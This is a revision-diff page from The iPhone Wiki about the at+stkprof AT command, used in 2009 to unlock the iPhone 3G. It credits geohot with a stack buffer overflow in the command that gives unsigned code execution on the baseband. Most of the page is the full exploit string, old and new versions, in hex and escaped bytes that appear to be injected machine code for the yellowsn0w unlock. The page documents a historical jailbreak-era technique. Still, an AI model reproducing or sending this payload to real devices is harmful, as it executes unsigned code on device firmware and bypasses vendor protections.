Difference between revisions of "AT+stkprof"

From The iPhone Wiki
Jump to: navigation, search
m (Implementation)
(New Implementation (yellowsn0w 0.9.8): better display)
Line 16: Line 16:
   
 
<pre>
 
<pre>
at+stkprof=1,"\x30\x36
+
at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf
  +
9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8
\x34\x61\x35\x34\x31\x63\x30\x34\x34\x62\x31\x38\x37\x38\x32\x32
 
  +
905120000000001010101020202020611301000c000000";"\x10\x32\x0F\x27
\x32\x38\x30\x33\x64\x30\x31\x30\x37\x30\x30\x31\x33\x32\x30\x31
 
\x39\x66\x31\x35\x34\x30\x30\x30\x31\x37\x30\x31\x30\x30\x35\x34
+
\xA8\x47\x0B\x01\x61\x78\xA8\x47\xC0\x46\xC0\x46\xC0\x46\xC0\x46
\x36\x65\x35\x36\x34\x30\x32\x30\x30\x30\x30\x30\x30\x30\x35\x63
+
\xC9\x18\x11\x70\x02\x34\x01\x32\xEF\xE7\xC0\x46\xC0\x46\x01\x37
  +
\x38\x47\x30\x30\x41\x29\x01\xDA09pG79pG024803A1013101601FBD0000
\x31\x33\x30\x31\x30\x30\x32\x36\x36\x65\x35\x36\x34\x30\x64\x64
 
  +
4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047
\x64\x64\x64\x64\x64\x64\x65\x65\x65\x65\x65\x65\x65\x65\x62\x38
 
  +
071CC56080204000A047802214495200144B041C9847099B0193442303930A23
\x39\x30\x35\x31\x32\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30
 
  +
013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1
\x31\x30\x31\x30\x31\x30\x32\x30\x32\x30\x32\x30\x32\x30\x36\x31
 
  +
0B4908980B4B984703E00B490898094B"
\x31\x33\x30\x31\x30\x30\x30\x63\x30\x30\x30\x30\x30\x30\x22\x3B
 
\x33\x33\x66\x38\x65\x37\x32\x30\x34\x37\x30\x30\x30\x30\x62\x66
+
\xBA\x43\x17\x1C\x0E\xA4\x0B\xA5\x01\x35\x21\x78\x78\x29\x0C\xD0
\x22\x10\x32\x0F\x27\xBA\x43\x17\x1C\x0E\xA4\x0B\xA5\x01\x35\x21
 
\x78\x78\x29\x0C\xD0\xA8\x47\x0B\x01\x61\x78\xA8\x47\xC0\x46\xC0
 
\x46\xC0\x46\xC0\x46\xC9\x18\x11\x70\x02\x34\x01\x32\xEF\xE7\xC0
 
\x46\xC0\x46\x01\x37\x38\x47\x30\x30\x41\x29\x01\xDA\x30\x39\x70
 
\x47\x37\x39\x70\x47\x30\x32\x34\x38\x30\x33\x41\x31\x30\x31\x33
 
\x31\x30\x31\x36\x30\x31\x46\x42\x44\x30\x30\x30\x30\x34\x43\x37
 
\x31\x31\x31\x34\x30\x46\x30\x42\x35\x31\x43\x34\x42\x38\x30\x32
 
\x36\x38\x42\x42\x30\x33\x36\x30\x31\x31\x38\x38\x30\x30\x38\x39
 
\x31\x31\x41\x34\x43\x33\x30\x31\x43\x41\x30\x34\x37\x30\x30\x32
 
\x35\x30\x39\x39\x30\x39\x38\x32\x30\x41\x30\x34\x37\x30\x37\x31
 
\x43\x43\x35\x36\x30\x38\x30\x32\x30\x34\x30\x30\x30\x41\x30\x34
 
\x37\x38\x30\x32\x32\x31\x34\x34\x39\x35\x32\x30\x30\x31\x34\x34
 
\x42\x30\x34\x31\x43\x39\x38\x34\x37\x30\x39\x39\x42\x30\x31\x39
 
\x33\x34\x34\x32\x33\x30\x33\x39\x33\x30\x41\x32\x33\x30\x31\x33
 
\x34\x30\x35\x39\x33\x30\x43\x32\x33\x32\x32\x31\x43\x30\x36\x39
 
\x33\x30\x46\x34\x39\x30\x30\x39\x35\x30\x32\x39\x36\x30\x34\x39
 
\x35\x33\x38\x31\x43\x30\x30\x32\x33\x30\x44\x34\x43\x41\x30\x34
 
\x37\x30\x32\x31\x43\x30\x30\x32\x38\x30\x34\x44\x31\x30\x42\x34
 
\x39\x30\x38\x39\x38\x30\x42\x34\x42\x39\x38\x34\x37\x30\x33\x45
 
\x30\x30\x42\x34\x39\x30\x38\x39\x38\x30\x39\x34\x42\x39\x38\x34
 
\x37\x30\x42\x42\x30\x46\x30\x42\x44\x30\x30\x30\x30\x34\x34\x42
 
\x33\x33\x42\x34\x30\x41\x43\x32\x30\x31\x34\x32\x30\x36\x34\x31
 
\x41\x30\x31\x30\x30\x41\x30\x35\x38\x33\x43\x32\x30\x34\x38\x31
 
\x41\x30\x31\x30\x30\x34\x30\x42\x35\x33\x46\x32\x30\x35\x34\x31
 
\x41\x30\x31\x30\x30\x30\x30\x44\x44\x34\x36\x32\x30\x35\x38\x31
 
\x41\x30\x31\x30\x30\x36\x34\x36\x35\x37\x36\x37\x34\x36\x35\x36
 
\x31\x36\x44\x33\x31\x30\x30\x30\x30\x30\x30\x30\x30\x34\x46\x34
 
\x42\x32\x31\x30\x30\x34\x35\x35\x32\x35\x32\x34\x46\x35\x32\x32
 
\x30\x32\x35\x36\x34\x30\x30\x30\x30\x30\x30\x30\x30\x33\x30\x42
 
\x35\x31\x31\x34\x44\x38\x35\x42\x30\x31\x31\x34\x42\x32\x38\x31
 
\x43\x36\x39\x34\x36\x46\x46\x32\x32\x39\x38\x34\x37\x30\x30\x39
 
\x42\x30\x44\x32\x42\x31\x31\x44\x31\x30\x31\x39\x39\x30\x44\x34
 
\x42\x30\x41\x36\x38\x31\x41\x36\x30\x30\x34\x33\x33\x34\x41\x36
 
\x38\x31\x41\x36\x30\x38\x41\x36\x38\x30\x42\x34\x42\x31\x33\x36
 
\x30\x30\x42\x34\x42\x35\x33\x36\x30\x30\x42\x34\x42\x39\x33\x36
 
\x30\x30\x31\x32\x33\x43\x42\x36\x30\x32\x30\x32\x33\x30\x30\x39
 
\x33\x32\x38\x31\x43\x36\x39\x34\x36\x46\x46\x32\x32\x30\x37\x34
 
\x42\x39\x38\x34\x37\x44\x46\x45\x37\x30\x30\x30\x30\x35\x34\x32
 
\x37\x32\x33\x34\x30\x39\x38\x35\x39\x31\x36\x32\x30\x42\x43\x37
 
\x39\x32\x46\x34\x30\x30\x30\x46\x46\x30\x30\x30\x31\x30\x31\x30
 
\x34\x30\x32\x30\x34\x30\x33\x30\x34\x30\x34\x30\x34\x36\x38\x44
 
\x35\x33\x45\x32\x30\x78\x78"
 
 
</pre>
 
</pre>
   

Revision as of 01:05, 9 May 2009

Used as an injection vector for the first iPhone 3G unlock payload.

Credit

geohot

Exploit

There is a stack-based buffer overflow in the at+stkprof command that allows unsigned code execution on the iPhone 3G baseband.

Implementation

The dev team used this exploit in the first public iPhone 3G unlock called yellowsn0w. It can be downloaded from Cydia, and is a daemon that will run in the background. It will inject their payload whenever the baseband is reset.

The source code (for old version 0.9.1) is also available here [1]

New Implementation (yellowsn0w 0.9.8)

In the newest yellowsn0w, this command is still used as the injection vector for the exploit, but it is used differently. It is still the at+stkprof command, but it seems to send their stuff all in one go.

at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf
9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8
905120000000001010101020202020611301000c000000";"\x10\x32\x0F\x27
\xBA\x43\x17\x1C\x0E\xA4\x0B\xA5\x01\x35\x21\x78\x78\x29\x0C\xD0
\xA8\x47\x0B\x01\x61\x78\xA8\x47\xC0\x46\xC0\x46\xC0\x46\xC0\x46
\xC9\x18\x11\x70\x02\x34\x01\x32\xEF\xE7\xC0\x46\xC0\x46\x01\x37
\x38\x47\x30\x30\x41\x29\x01\xDA09pG79pG024803A1013101601FBD0000
4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047
071CC56080204000A047802214495200144B041C9847099B0193442303930A23
013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1
0B4908980B4B984703E00B490898094B"

Information on how this was used can be found here